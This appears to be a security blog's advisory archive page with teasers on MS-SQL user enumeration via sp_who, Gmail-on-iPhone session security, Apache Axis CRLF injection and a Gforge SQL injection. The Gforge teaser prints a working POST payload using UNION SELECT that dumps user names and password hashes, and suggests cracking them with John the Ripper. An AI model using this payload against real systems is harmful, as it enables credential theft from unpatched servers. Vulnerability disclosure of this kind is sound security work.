Category Archives: Advisories

MS-SQL [2000&2005] User Enumeration Via sp_who

In SQL server 2005, if you are not ‘sa’ you can’t do much. This is primarily because openrowset is by default not available unless you are privileged. Stored procedure sp_who is available for public(in mssql 2000 and 2005). This procedure “provides information about current Microsoft® SQL Server™ users and processes”.… Read More

Gmail on iphone..notsosecure

If you are concerned about the security of your emails, accessing Gmail from a mobile device may not be a great idea. 1. A few weeks ago, google introduced a new feature in GMAIL, through which you can force the gmail session to not use HTTP at all, and only… Read More

Apache Axis CRLF And Content Injection

Version tested:- 1.4 vendor's website:- http://ws.apache.org/axis/ Details:- The vulnerability reported earlier this year, was later addressed by apache axis group and the error messages in version 1.4  do not leak the document root or any directory structure. However, the error message returned for an non-existing WSDL is vulnerable to CRLF… Read More

Gforge SQL Injection

Original Advisory: http://www.portcullis-security.com/179.php  The file /www/people/editprofile.php seems to be vulnerable to sql injection at multiple points. The exploit is fairly easy, one post request returns all the usernames and hashes from the backend database. The hashes can then be cracked using john-the-ripper. Exploit:- POST request to:/www/people/editprofile.php skill_delete%5B%5D=484)+UNION+ALL+SELECT+user_name||unix_pw+ from+users–%3d1&MultiDelete=Delete works against… Read More